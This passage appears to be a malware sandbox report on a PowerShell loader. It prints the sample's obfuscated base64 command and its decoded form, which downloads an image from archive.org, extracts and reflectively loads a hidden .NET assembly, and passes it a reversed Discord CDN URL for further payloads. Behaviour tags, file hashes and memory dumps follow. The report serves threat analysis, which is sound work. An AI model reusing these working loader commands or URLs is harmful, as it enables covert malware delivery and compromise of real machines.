ⓡ ∮ ⬝Gw⨢ ˛ ⓡ ∮ ⬝eQ⨢ ˛ ⓡ ∮ ⬝g⨢ ˛ ⓡ ∮ ⬝D0⨢ ˛ ⓡ ∮ ⬝I⨢ ˛ ⓡ ∮ ⬝Bb⨢ ˛ ⓡ ∮ ⬝FM⨢ ˛ ⓡ ∮ ⬝eQBz⨢ ˛ ⓡ ∮ ⬝HQ⨢ ˛ ⓡ ∮ ⬝ZQBt⨢ ˛ ⓡ ∮ ⬝C4⨢ ˛ ⓡ ∮ ⬝UgBl⨢ ˛ ⓡ ∮ ⬝GY⨢ ˛ ⓡ ∮ ⬝b⨢ ˛ ⓡ ∮ ⬝Bl⨢ ˛ ⓡ ∮ ⬝GM⨢ ˛ ⓡ ∮ ⬝d⨢ ˛ ⓡ ∮ ⬝Bp⨢ ˛ ⓡ ∮ ⬝G8⨢ ˛ ⓡ ∮ ⬝bg⨢ ˛ ⓡ ∮ ⬝u⨢ ˛ ⓡ ∮ ⬝EE⨢ ˛ ⓡ ∮ ⬝cwBz⨢ ˛ ⓡ ∮ ⬝GU⨢ ˛ ⓡ ∮ ⬝bQBi⨢ ˛ ⓡ ∮ ⬝Gw⨢ ˛ ⓡ ∮ ⬝eQBd⨢ ˛ ⓡ ∮ ⬝Do⨢ ˛ ⓡ ∮ ⬝OgBM⨢ ˛ ⓡ ∮ ⬝G8⨢ ˛ ⓡ ∮ ⬝YQBk⨢ ˛ ⓡ ∮ ⬝Cg⨢ ˛ ⓡ ∮ ⬝J⨢ ˛ ⓡ ∮ ⬝Bj⨢ ˛ ⓡ ∮ ⬝G8⨢ ˛ ⓡ ∮ ⬝bQBt⨢ ˛ ⓡ ∮ ⬝GE⨢ ˛ ⓡ ∮ ⬝bgBk⨢ ˛ ⓡ ∮ ⬝EI⨢ ˛ ⓡ ∮ ⬝eQB0⨢ ˛ ⓡ ∮ ⬝GU⨢ ˛ ⓡ ∮ ⬝cw⨢ ˛ ⓡ ∮ ⬝p⨢ ˛ ⓡ ∮ ⬝Ds⨢ ˛ ⓡ ∮ ⬝J⨢ ˛ ⓡ ∮ ⬝B0⨢ ˛ ⓡ ∮ ⬝Hk⨢ ˛ ⓡ ∮ ⬝c⨢ ˛ ⓡ ∮ ⬝Bl⨢ ˛ ⓡ ∮ ⬝C⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝PQ⨢ ˛ ⓡ ∮ ⬝g⨢ ˛ ⓡ ∮ ⬝CQ⨢ ˛ ⓡ ∮ ⬝b⨢ ˛ ⓡ ∮ ⬝Bv⨢ ˛ ⓡ ∮ ⬝GE⨢ ˛ ⓡ ∮ ⬝Z⨢ ˛ ⓡ ∮ ⬝Bl⨢ ˛ ⓡ ∮ ⬝GQ⨢ ˛ ⓡ ∮ ⬝QQBz⨢ ˛ ⓡ ∮ ⬝HM⨢ ˛ ⓡ ∮ ⬝ZQBt⨢ ˛ ⓡ ∮ ⬝GI⨢ ˛ ⓡ ∮ ⬝b⨢ ˛ ⓡ ∮ ⬝B5⨢ ˛ ⓡ ∮ ⬝C4⨢ ˛ ⓡ ∮ ⬝RwBl⨢ ˛ ⓡ ∮ ⬝HQ⨢ ˛ ⓡ ∮ ⬝V⨢ ˛ ⓡ ∮ ⬝B5⨢ ˛ ⓡ ∮ ⬝H⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝ZQ⨢ ˛ ⓡ ∮ ⬝o⨢ ˛ ⓡ ∮ ⬝Cc⨢ ˛ ⓡ ∮ ⬝Z⨢ ˛ ⓡ ∮ ⬝Bu⨢ ˛ ⓡ ∮ ⬝Gw⨢ ˛ ⓡ ∮ ⬝aQBi⨢ ˛ ⓡ ∮ ⬝C4⨢ ˛ ⓡ ∮ ⬝SQBP⨢ ˛ ⓡ ∮ ⬝C4⨢ ˛ ⓡ ∮ ⬝S⨢ ˛ ⓡ ∮ ⬝Bv⨢ ˛ ⓡ ∮ ⬝G0⨢ ˛ ⓡ ∮ ⬝ZQ⨢ ˛ ⓡ ∮ ⬝n⨢ ˛ ⓡ ∮ ⬝Ck⨢ ˛ ⓡ ∮ ⬝Ow⨢ ˛ ⓡ ∮ ⬝k⨢ ˛ ⓡ ∮ ⬝G0⨢ ˛ ⓡ ∮ ⬝ZQB0⨢ ˛ ⓡ ∮ ⬝Gg⨢ ˛ ⓡ ∮ ⬝bwBk⨢ ˛ ⓡ ∮ ⬝C⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝PQ⨢ ˛ ⓡ ∮ ⬝g⨢ ˛ ⓡ ∮ ⬝CQ⨢ ˛ ⓡ ∮ ⬝d⨢ ˛ ⓡ ∮ ⬝B5⨢ ˛ ⓡ ∮ ⬝H⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝ZQ⨢ ˛ ⓡ ∮ ⬝u⨢ ˛ ⓡ ∮ ⬝Ec⨢ ˛ ⓡ ∮ ⬝ZQB0⨢ ˛ ⓡ ∮ ⬝E0⨢ ˛ ⓡ ∮ ⬝ZQB0⨢ ˛ ⓡ ∮ ⬝Gg⨢ ˛ ⓡ ∮ ⬝bwBk⨢ ˛ ⓡ ∮ ⬝Cg⨢ ˛ ⓡ ∮ ⬝JwBW⨢ ˛ ⓡ ∮ ⬝EE⨢ ˛ ⓡ ∮ ⬝SQ⨢ ˛ ⓡ ∮ ⬝n⨢ ˛ ⓡ ∮ ⬝Ck⨢ ˛ ⓡ ∮ ⬝LgBJ⨢ ˛ ⓡ ∮ ⬝G4⨢ ˛ ⓡ ∮ ⬝dgBv⨢ ˛ ⓡ ∮ ⬝Gs⨢ ˛ ⓡ ∮ ⬝ZQ⨢ ˛ ⓡ ∮ ⬝o⨢ ˛ ⓡ ∮ ⬝CQ⨢ ˛ ⓡ ∮ ⬝bgB1⨢ ˛ ⓡ ∮ ⬝Gw⨢ ˛ ⓡ ∮ ⬝b⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝s⨢ ˛ ⓡ ∮ ⬝C⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝WwBv⨢ ˛ ⓡ ∮ ⬝GI⨢ ˛ ⓡ ∮ ⬝agBl⨢ ˛ ⓡ ∮ ⬝GM⨢ ˛ ⓡ ∮ ⬝d⨢ ˛ ⓡ ∮ ⬝Bb⨢ ˛ ⓡ ∮ ⬝F0⨢ ˛ ⓡ ∮ ⬝XQ⨢ ˛ ⓡ ∮ ⬝g⨢ ˛ ⓡ ∮ ⬝Cg⨢ ˛ ⓡ ∮ ⬝Jw⨢ ˛ ⓡ ∮ ⬝m⨢ ˛ ⓡ ∮ ⬝DY⨢ ˛ ⓡ ∮ ⬝MQBm⨢ ˛ ⓡ ∮ ⬝GY⨢ ˛ ⓡ ∮ ⬝Yg⨢ ˛ ⓡ ∮ ⬝1⨢ ˛ ⓡ ∮ ⬝DI⨢ ˛ ⓡ ∮ ⬝NwBh⨢ ˛ ⓡ ∮ ⬝GE⨢ ˛ ⓡ ∮ ⬝YQ⨢ ˛ ⓡ ∮ ⬝2⨢ ˛ ⓡ ∮ ⬝DU⨢ ˛ ⓡ ∮ ⬝MQ⨢ ˛ ⓡ ∮ ⬝4⨢ ˛ ⓡ ∮ ⬝D⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝MQ⨢ ˛ ⓡ ∮ ⬝1⨢ ˛ ⓡ ∮ ⬝Dg⨢ ˛ ⓡ ∮ ⬝MQ⨢ ˛ ⓡ ∮ ⬝y⨢ ˛ ⓡ ∮ ⬝DU⨢ ˛ ⓡ ∮ ⬝YQ⨢ ˛ ⓡ ∮ ⬝5⨢ ˛ ⓡ ∮ ⬝D⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝MQ⨢ ˛ ⓡ ∮ ⬝0⨢ ˛ ⓡ ∮ ⬝DI⨢ ˛ ⓡ ∮ ⬝OQ⨢ ˛ ⓡ ∮ ⬝y⨢ ˛ ⓡ ∮ ⬝GQ⨢ ˛ ⓡ ∮ ⬝NQ⨢ ˛ ⓡ ∮ ⬝0⨢ ˛ ⓡ ∮ ⬝Dc⨢ ˛ ⓡ ∮ ⬝N⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝w⨢ ˛ ⓡ ∮ ⬝Dg⨢ ˛ ⓡ ∮ ⬝O⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝z⨢ ˛ ⓡ ∮ ⬝DY⨢ ˛ ⓡ ∮ ⬝YQBm⨢ ˛ ⓡ ∮ ⬝Dg⨢ ˛ ⓡ ∮ ⬝YwBj⨢ ˛ ⓡ ∮ ⬝GQ⨢ ˛ ⓡ ∮ ⬝O⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝z⨢ ˛ ⓡ ∮ ⬝Dk⨢ ˛ ⓡ ∮ ⬝MQ⨢ ˛ ⓡ ∮ ⬝y⨢ ˛ ⓡ ∮ ⬝Dk⨢ ˛ ⓡ ∮ ⬝Yg⨢ ˛ ⓡ ∮ ⬝y⨢ ˛ ⓡ ∮ ⬝GY⨢ ˛ ⓡ ∮ ⬝Ng⨢ ˛ ⓡ ∮ ⬝3⨢ ˛ ⓡ ∮ ⬝DQ⨢ ˛ ⓡ ∮ ⬝M⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝y⨢ ˛ ⓡ ∮ ⬝DM⨢ ˛ ⓡ ∮ ⬝O⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝w⨢ ˛ ⓡ ∮ ⬝GE⨢ ˛ ⓡ ∮ ⬝PQBt⨢ ˛ ⓡ ∮ ⬝Gg⨢ ˛ ⓡ ∮ ⬝Jg⨢ ˛ ⓡ ∮ ⬝5⨢ ˛ ⓡ ∮ ⬝GU⨢ ˛ ⓡ ∮ ⬝Yw⨢ ˛ ⓡ ∮ ⬝y⨢ ˛ ⓡ ∮ ⬝GY⨢ ˛ ⓡ ∮ ⬝Yw⨢ ˛ ⓡ ∮ ⬝2⨢ ˛ ⓡ ∮ ⬝DY⨢ ˛ ⓡ ∮ ⬝PQBz⨢ ˛ ⓡ ∮ ⬝Gk⨢ ˛ ⓡ ∮ ⬝Jg⨢ ˛ ⓡ ∮ ⬝5⨢ ˛ ⓡ ∮ ⬝DY⨢ ˛ ⓡ ∮ ⬝ZQ⨢ ˛ ⓡ ∮ ⬝3⨢ ˛ ⓡ ∮ ⬝D⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝Z⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝2⨢ ˛ ⓡ ∮ ⬝DY⨢ ˛ ⓡ ∮ ⬝PQB4⨢ ˛ ⓡ ∮ ⬝GU⨢ ˛ ⓡ ∮ ⬝PwB0⨢ ˛ ⓡ ∮ ⬝Hg⨢ ˛ ⓡ ∮ ⬝d⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝u⨢ ˛ ⓡ ∮ ⬝Gk⨢ ˛ ⓡ ∮ ⬝c⨢ ˛ ⓡ ∮ ⬝Bh⨢ ˛ ⓡ ∮ ⬝H⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝Lw⨢ ˛ ⓡ ∮ ⬝4⨢ ˛ ⓡ ∮ ⬝DQ⨢ ˛ ⓡ ∮ ⬝Mw⨢ ˛ ⓡ ∮ ⬝0⨢ ˛ ⓡ ∮ ⬝Dg⨢ ˛ ⓡ ∮ ⬝Mg⨢ ˛ ⓡ ∮ ⬝5⨢ ˛ ⓡ ∮ ⬝DU⨢ ˛ ⓡ ∮ ⬝NQ⨢ ˛ ⓡ ∮ ⬝2⨢ ˛ ⓡ ∮ ⬝Dk⨢ ˛ ⓡ ∮ ⬝O⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝y⨢ ˛ ⓡ ∮ ⬝DU⨢ ˛ ⓡ ∮ ⬝Mw⨢ ˛ ⓡ ∮ ⬝4⨢ ˛ ⓡ ∮ ⬝Dc⨢ ˛ ⓡ ∮ ⬝Mg⨢ ˛ ⓡ ∮ ⬝x⨢ ˛ ⓡ ∮ ⬝C8⨢ ˛ ⓡ ∮ ⬝Nw⨢ ˛ ⓡ ∮ ⬝3⨢ ˛ ⓡ ∮ ⬝DU⨢ ˛ ⓡ ∮ ⬝M⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝y⨢ ˛ ⓡ ∮ ⬝Dg⨢ ˛ ⓡ ∮ ⬝MQ⨢ ˛ ⓡ ∮ ⬝x⨢ ˛ ⓡ ∮ ⬝DY⨢ ˛ ⓡ ∮ ⬝N⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝z⨢ ˛ ⓡ ∮ ⬝DU⨢ ˛ ⓡ ∮ ⬝Mg⨢ ˛ ⓡ ∮ ⬝1⨢ ˛ ⓡ ∮ ⬝DM⨢ ˛ ⓡ ∮ ⬝O⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝3⨢ ˛ ⓡ ∮ ⬝DI⨢ ˛ ⓡ ∮ ⬝MQ⨢ ˛ ⓡ ∮ ⬝v⨢ ˛ ⓡ ∮ ⬝HM⨢ ˛ ⓡ ∮ ⬝d⨢ ˛ ⓡ ∮ ⬝Bu⨢ ˛ ⓡ ∮ ⬝GU⨢ ˛ ⓡ ∮ ⬝bQBo⨢ ˛ ⓡ ∮ ⬝GM⨢ ˛ ⓡ ∮ ⬝YQB0⨢ ˛ ⓡ ∮ ⬝HQ⨢ ˛ ⓡ ∮ ⬝YQ⨢ ˛ ⓡ ∮ ⬝v⨢ ˛ ⓡ ∮ ⬝G0⨢ ˛ ⓡ ∮ ⬝bwBj⨢ ˛ ⓡ ∮ ⬝C4⨢ ˛ ⓡ ∮ ⬝c⨢ ˛ ⓡ ∮ ⬝Bw⨢ ˛ ⓡ ∮ ⬝GE⨢ ˛ ⓡ ∮ ⬝Z⨢ ˛ ⓡ ∮ ⬝By⨢ ˛ ⓡ ∮ ⬝G8⨢ ˛ ⓡ ∮ ⬝YwBz⨢ ˛ ⓡ ∮ ⬝Gk⨢ ˛ ⓡ ∮ ⬝Z⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝u⨢ ˛ ⓡ ∮ ⬝G4⨢ ˛ ⓡ ∮ ⬝Z⨢ ˛ ⓡ ∮ ⬝Bj⨢ ˛ ⓡ ∮ ⬝C8⨢ ˛ ⓡ ∮ ⬝Lw⨢ ˛ ⓡ ∮ ⬝6⨢ ˛ ⓡ ∮ ⬝HM⨢ ˛ ⓡ ∮ ⬝c⨢ ˛ ⓡ ∮ ⬝B0⨢ ˛ ⓡ ∮ ⬝HQ⨢ ˛ ⓡ ∮ ⬝a⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝n⨢ ˛ ⓡ ∮ ⬝C⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝L⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝g⨢ ˛ ⓡ ∮ ⬝Cc⨢ ˛ ⓡ ∮ ⬝MQ⨢ ˛ ⓡ ∮ ⬝n⨢ ˛ ⓡ ∮ ⬝C⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝L⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝g⨢ ˛ ⓡ ∮ ⬝Cc⨢ ˛ ⓡ ∮ ⬝Qw⨢ ˛ ⓡ ∮ ⬝6⨢ ˛ ⓡ ∮ ⬝Fw⨢ ˛ ⓡ ∮ ⬝U⨢ ˛ ⓡ ∮ ⬝By⨢ ˛ ⓡ ∮ ⬝G8⨢ ˛ ⓡ ∮ ⬝ZwBy⨢ ˛ ⓡ ∮ ⬝GE⨢ ˛ ⓡ ∮ ⬝bQBE⨢ ˛ ⓡ ∮ ⬝GE⨢ ˛ ⓡ ∮ ⬝d⨢ ˛ ⓡ ∮ ⬝Bh⨢ ˛ ⓡ ∮ ⬝Fw⨢ ˛ ⓡ ∮ ⬝Jw⨢ ˛ ⓡ ∮ ⬝g⨢ ˛ ⓡ ∮ ⬝Cw⨢ ˛ ⓡ ∮ ⬝I⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝n⨢ ˛ ⓡ ∮ ⬝H⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝ZQBz⨢ ˛ ⓡ ∮ ⬝HM⨢ ˛ ⓡ ∮ ⬝ZQBn⨢ ˛ ⓡ ∮ ⬝HU⨢ ˛ ⓡ ∮ ⬝ZQBp⨢ ˛ ⓡ ∮ ⬝HI⨢ ˛ ⓡ ∮ ⬝bw⨢ ˛ ⓡ ∮ ⬝n⨢ ˛ ⓡ ∮ ⬝Cw⨢ ˛ ⓡ ∮ ⬝JwBJ⨢ ˛ ⓡ ∮ ⬝G4⨢ ˛ ⓡ ∮ ⬝cwB0⨢ ˛ ⓡ ∮ ⬝GE⨢ ˛ ⓡ ∮ ⬝b⨢ ˛ ⓡ ∮ ⬝Bs⨢ ˛ ⓡ ∮ ⬝FU⨢ ˛ ⓡ ∮ ⬝d⨢ ˛ ⓡ ∮ ⬝Bp⨢ ˛ ⓡ ∮ ⬝Gw⨢ ˛ ⓡ ∮ ⬝Jw⨢ ˛ ⓡ ∮ ⬝s⨢ ˛ ⓡ ∮ ⬝Cc⨢ ˛ ⓡ ∮ ⬝Z⨢ ˛ ⓡ ∮ ⬝Bl⨢ ˛ ⓡ ∮ ⬝HM⨢ ˛ ⓡ ∮ ⬝YQB0⨢ ˛ ⓡ ∮ ⬝Gk⨢ ˛ ⓡ ∮ ⬝dgBh⨢ ˛ ⓡ ∮ ⬝GQ⨢ ˛ ⓡ ∮ ⬝bw⨢ ˛ ⓡ ∮ ⬝n⨢ ˛ ⓡ ∮ ⬝Ck⨢ ˛ ⓡ ∮ ⬝KQ⨢ ˛ ⓡ ∮ ⬝=';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo.replace('⨢ ˛ ⓡ ∮ ⬝','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:432
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&61ffb527aaa65180158125a9014292d547408836af8ccd839129b2f67402380a=mh&9ec2fc66=si&96e70d66=xe?txt.ipap/8434829556982538721/7750281164352538721/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'pessegueiro','InstallUtil','desativado'))"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Adds Run key to start application
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3392
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\pessegueiro.js"
          4⤵
            PID:4784
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
            4⤵
              PID:3012
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
              4⤵
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4516

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
        Filesize

        3KB

        MD5

        f41839a3fe2888c8b3050197bc9a0a05

        SHA1

        0798941aaf7a53a11ea9ed589752890aee069729

        SHA256

        224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

        SHA512

        2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        64B

        MD5

        5caad758326454b5788ec35315c4c304

        SHA1

        3aef8dba8042662a7fcf97e51047dc636b4d4724

        SHA256

        83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

        SHA512

        4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5j5ejy4a.3gp.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • memory/432-12-0x00007FFD38020000-0x00007FFD38AE1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/432-0-0x00007FFD38023000-0x00007FFD38025000-memory.dmp

        Filesize

        8KB

        Download

      • memory/432-13-0x00007FFD38020000-0x00007FFD38AE1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/432-11-0x00007FFD38020000-0x00007FFD38AE1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/432-1-0x0000017DE6C50000-0x0000017DE6C72000-memory.dmp

        Filesize

        136KB

        Download

      • memory/432-31-0x00007FFD38020000-0x00007FFD38AE1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3392-23-0x0000021344D70000-0x0000021344E92000-memory.dmp

        Filesize

        1.1MB

        Download

      • memory/4516-25-0x0000000000400000-0x0000000000440000-memory.dmp

        Filesize

        256KB

        Download

      • memory/4516-32-0x0000000005A10000-0x0000000005FB4000-memory.dmp

        Filesize

        5.6MB

        Download

      • memory/4516-33-0x00000000054D0000-0x0000000005536000-memory.dmp

        Filesize

        408KB

        Download

      • memory/4516-34-0x0000000006260000-0x00000000062B0000-memory.dmp

        Filesize

        320KB

        Download

      • memory/4516-35-0x0000000006350000-0x00000000063E2000-memory.dmp

        Filesize

        584KB

        Download

      • memory/4516-36-0x00000000062F0000-0x00000000062FA000-memory.dmp

        Filesize

        40KB

        Download